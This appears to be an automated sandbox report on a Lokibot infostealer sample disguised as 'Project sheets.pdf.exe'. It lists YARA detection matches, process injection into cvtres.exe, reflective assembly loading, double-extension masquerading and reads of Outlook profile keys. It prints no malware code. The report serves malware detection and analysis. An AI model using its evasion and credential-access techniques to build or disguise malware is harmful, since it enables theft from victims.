                Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: Process Memory Space: Project sheets.pdf.exe PID: 5648, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: cvtres.exe PID: 3896, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F31300_2_017F3130
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F94680_2_017F9468
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F04480_2_017F0448
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F40D80_2_017F40D8
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F27580_2_017F2758
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F1F080_2_017F1F08
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F99290_2_017F9929
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017FA5D00_2_017FA5D0
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F61C80_2_017F61C8
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017FA5C00_2_017FA5C0
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F61B90_2_017F61B9
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F94590_2_017F9459
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F40300_2_017F4030
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F40C80_2_017F40C8
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F5B580_2_017F5B58
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F5B500_2_017F5B50
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F63E80_2_017F63E8
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F63D90_2_017F63D9
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F7BC80_2_017F7BC8
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F4FA80_2_017F4FA8
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F4F980_2_017F4F98
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F1E680_2_017F1E68
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F5E530_2_017F5E53
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F6E080_2_017F6E08
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F1ECF0_2_017F1ECF
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F66980_2_017F6698
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F66890_2_017F6689
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0040549C3_2_0040549C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_004029D43_2_004029D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: String function: 00405B6F appears 42 times
                Source: Project sheets.pdf.exe, 00000000.00000000.235919369.0000000000E42000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameQQBCXNMHJF.exe6 vs Project sheets.pdf.exe
                Source: Project sheets.pdf.exe, 00000000.00000002.245997342.0000000003130000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWHGDFHKDLHDJD.dll< vs Project sheets.pdf.exe
                Source: Project sheets.pdf.exe, 00000000.00000002.245726973.0000000001528000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Project sheets.pdf.exe
                Source: Project sheets.pdf.exe, 00000000.00000002.246034817.00000000031D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWHGDFHKDLHDJD.dll< vs Project sheets.pdf.exe
                Source: Project sheets.pdf.exe, 00000000.00000002.246236248.00000000041EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs Project sheets.pdf.exe
                Source: Project sheets.pdf.exeBinary or memory string: OriginalFilenameQQBCXNMHJF.exe6 vs Project sheets.pdf.exe
                Source: Project sheets.pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: Project sheets.pdf.exeStatic PE information: invalid certificate
                Source: Project sheets.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Project sheets.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Project sheets.pdf.exe "C:\Users\user\Desktop\Project sheets.pdf.exe"
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeJump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeJump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,3_2_0040650A
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Project sheets.pdf.exe.logJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@74/3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,3_2_0040434D
                Source: Project sheets.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                Source: Project sheets.pdf.exe, u202c????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
                Source: Project sheets.pdf.exe, u202c????????????????????????????????????????.csCryptographic APIs: 'TransformBlock'
                Source: Project sheets.pdf.exe, u202c????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.0.Project sheets.pdf.exe.e40000.0.unpack, u202c????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.0.Project sheets.pdf.exe.e40000.0.unpack, u202c????????????????????????????????????????.csCryptographic APIs: 'TransformBlock'
                Source: 0.0.Project sheets.pdf.exe.e40000.0.unpack, u202c????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                Source: Project sheets.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Project sheets.pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Project sheets.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: WHGDFHKDLHDJD.pdb source: Project sheets.pdf.exe, 00000000.00000002.245997342.0000000003130000.00000004.08000000.00040000.00000000.sdmp, Project sheets.pdf.exe, 00000000.00000002.246034817.00000000031D1000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: QQBCXNMHJF.pdb source: Project sheets.pdf.exe

                Data Obfuscation

                barindex
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Project sheets.pdf.exe.41d5530.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Project sheets.pdf.exe PID: 5648, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 3896, type: MEMORYSTR
                Source: Project sheets.pdf.exe, u200b????????????????????????????????????????.cs.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: Project sheets.pdf.exe, u206f????????????????????????????????????????.cs.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 0.0.Project sheets.pdf.exe.e40000.0.unpack, u200b????????????????????????????????????????.cs.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 0.0.Project sheets.pdf.exe.e40000.0.unpack, u206f????????????????????????????????????????.cs.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeCode function: 0_2_017F88F7 pushfd ; iretd 0_2_017F88F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00402AC0 push eax; ret 3_2_00402AD4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00402AC0 push eax; ret 3_2_00402AFC
                Source: Project sheets.pdf.exeStatic PE information: real checksum: 0x34a44 should be: 0x37cfc
                Source: initial sampleStatic PE information: section name: .text entropy: 7.534046578744168

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: Possible double extension: pdf.exeStatic PE information: Project sheets.pdf.exe
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
